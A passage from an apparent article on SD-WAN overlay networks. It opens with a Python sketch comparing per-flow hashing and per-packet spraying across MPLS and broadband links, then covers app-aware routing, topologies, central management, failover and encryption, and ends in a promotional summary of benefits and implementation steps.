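    """Round-robin per-packet spraying: a single flow can use every link's
    capacity, at the cost of reordering when the links have different latency."""
    rr = cycle(links)
    return [next(rr) for _ in range(n_packets)]


def distribute(flows: List[Flow], weights: Dict[str, int]) -> Dict[str, int]:
    """How many flows land on each link under per-flow balancing."""
    counts = {link: 0 for link in weights}
    for f in flows:
        counts[per_flow_pick(f, weights)] += 1
    return counts


# Constructed flows: one client opening 1000 connections to the same server.
SAMPLE_FLOWS: List[Flow] = [("10.0.1.10", "10.0.9.5", 40000 + i, 443, "tcp") for i in range(1000)]
# Broadband is four times the MPLS circuit's capacity, so it gets four times the slots.
WEIGHTS = {"mpls-1": 1, "broadband-1": 4}

if __name__ == "__main__":
    print("per-flow distribution:", distribute(SAMPLE_FLOWS, WEIGHTS))
    print("per-packet spray:", per_packet_spray(6, ["mpls-1", "broadband-1"]))
```

Per-flow hashing is the safe default because it cannot reorder a flow, but a single elephant flow is then capped at one link's bandwidth; per-packet spraying lifts that cap and is what link bonding for a large file transfer needs, which is why the transports being bonded should have similar latency.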

      • App-aware routing capabilities 

As we know, application visibility is critical to forwarding efficiently over either transport. Still, we also need to go one step further, look deep inside the application, and understand what sub-applications exist, such as distinguishing Facebook chat from regular Facebook browsing. This allows you to balance loads across the WAN based on sub-applications.

      • Regional-specific routing topologies

Several topologies are available, including hub and spoke, full mesh, and Internet PoP topologies. Each organization will have different requirements for choosing a topology. For example, voice should use a full mesh design, while data requires a hub and spoke connecting to a central data center.

As we are moving heavily into the use of cloud applications, local internet access/internet breakout is a better strategic option than backhauling traffic to a central site when it doesn’t need to be. SD-WAN abstracts the details of the WAN, enabling application-independent topologies. Each application can have its own topology, and this can be dynamically changed. All of this is managed by an SD-WAN control plane.

      • Centralized device management & policy administration 

With the controller-based approach that SD-WAN takes, you are not embedding the control plane in the network. This allows you to centrally provision devices and push policy and any other instructions down to the data plane from a central location. This simplifies management and increases scale. The manual box-by-box approach to policy enforcement is not the way forward.

The ability to tie everything to a template and automate enables rapid branch deployments, security updates, and other policy changes. It’s much better to manage it all in one central place with the ability to dynamically push out what’s needed, such as updates and other configuration changes. 

      • High availability with automatic failovers 

You cannot apply a single viewpoint to high availability. Many components are involved in creating a high availability plan, such as device-, link-, and site-level high availability requirements; these should be addressed in an end-to-end solution. In addition, traditional WANs require additional telemetry information to detect failures and brown-out events.

      • Encryption on all transports, irrespective of link type 

Regardless of link type, MPLS, LTE, or the Internet, we need the capacity to encrypt all those paths without the excess baggage and complications that IPsec brings. Encryption should happen automatically, and the complexity of IPsec should be abstracted.

Summary: SD WAN Overlay

In today’s digital landscape, businesses increasingly rely on cloud-based applications, remote workforces, and data-driven operations. As a result, the demand for a more flexible, scalable, and secure network infrastructure has never been greater. This is where SD-WAN overlay comes into play, revolutionizing how organizations connect and operate.

SD-WAN overlay is a network architecture that allows organizations to abstract and virtualize their wide area networks, decoupling them from the underlying physical infrastructure. It utilizes software-defined networking (SDN) principles to create an overlay network that runs on top of the existing WAN infrastructure, enabling centralized management, control, and optimization of network traffic.

Key benefits of SD-WAN overlay 

1. Enhanced Performance and Reliability:

SD-WAN overlay leverages multiple network paths to distribute traffic intelligently, ensuring optimal performance and reliability. By dynamically routing traffic based on real-time conditions, businesses can overcome network congestion, reduce latency, and maximize application performance. This capability is particularly crucial for organizations with distributed branch offices or remote workers, as it enables seamless connectivity and productivity.

2. Cost Efficiency and Scalability:

Traditional WAN architectures can be expensive to implement and maintain, especially when organizations need to expand their network footprint. SD-WAN overlay offers a cost-effective alternative by utilizing existing infrastructure and incorporating affordable broadband connections. With centralized management and simplified configuration, scaling the network becomes a breeze, allowing businesses to adapt quickly to changing demands without breaking the bank.

3. Improved Security and Compliance:

In an era of increasing cybersecurity threats, protecting sensitive data and ensuring regulatory compliance are paramount. SD-WAN overlay incorporates advanced security features to safeguard network traffic, including encryption, authentication, and threat detection. Businesses can effectively mitigate risks, maintain data integrity, and comply with industry regulations by segmenting network traffic and applying granular security policies.

4. Streamlined Network Management:

Managing a complex network infrastructure can be a daunting task. SD-WAN overlay simplifies network management with centralized control and visibility, enabling administrators to monitor and manage the entire network from a single pane of glass. This level of control allows for faster troubleshooting, policy enforcement, and network optimization, resulting in improved operational efficiency and reduced downtime.

5. Agility and Flexibility:

In today’s fast-paced business environment, agility is critical to staying competitive. SD-WAN overlay empowers organizations to adapt rapidly to changing business needs by providing the flexibility to integrate new technologies and services seamlessly. Whether adding new branch locations, integrating cloud applications, or adopting emerging technologies like IoT, SD-WAN overlay offers businesses the agility to stay ahead of the curve.

Implementation of SD-WAN Overlay:

Implementing SD-WAN overlay requires careful planning and consideration. The following steps outline a typical implementation process:

1. Assess Network Requirements: Evaluate existing network infrastructure, bandwidth requirements, and application performance needs to determine the most suitable SD-WAN overlay solution.

2. Design and Architecture: Create a network design incorporating SD-WAN overlay while considering factors such as branch office connectivity, data center integration, and security requirements.

3. Vendor Selection: Choose a reliable and reputable SD-WAN overlay vendor based on their technology, features, support, and scalability.

4. Deployment and Configuration: Install the required hardware or virtual appliances and configure the SD-WAN overlay solution according to the network design. This includes setting up policies, traffic routing, and security parameters.

5. Testing and Optimization: Thoroughly test the SD-WAN overlay solution, ensuring its compatibility with existing applications and network infrastructure. Optimize the solution based on performance metrics and user feedback.

Conclusion: SD-WAN overlay is a game-changer for businesses seeking to optimize their network infrastructure. By enhancing performance, reducing costs, improving security, streamlining management, and enabling agility, SD-WAN overlay unlocks the true potential of connectivity. Embracing this technology allows organizations to embrace digital transformation, drive innovation, and gain a competitive edge in the digital era. In an ever-evolving business landscape, SD-WAN overlay is the key to unlocking new growth opportunities and future-proofing your network infrastructure.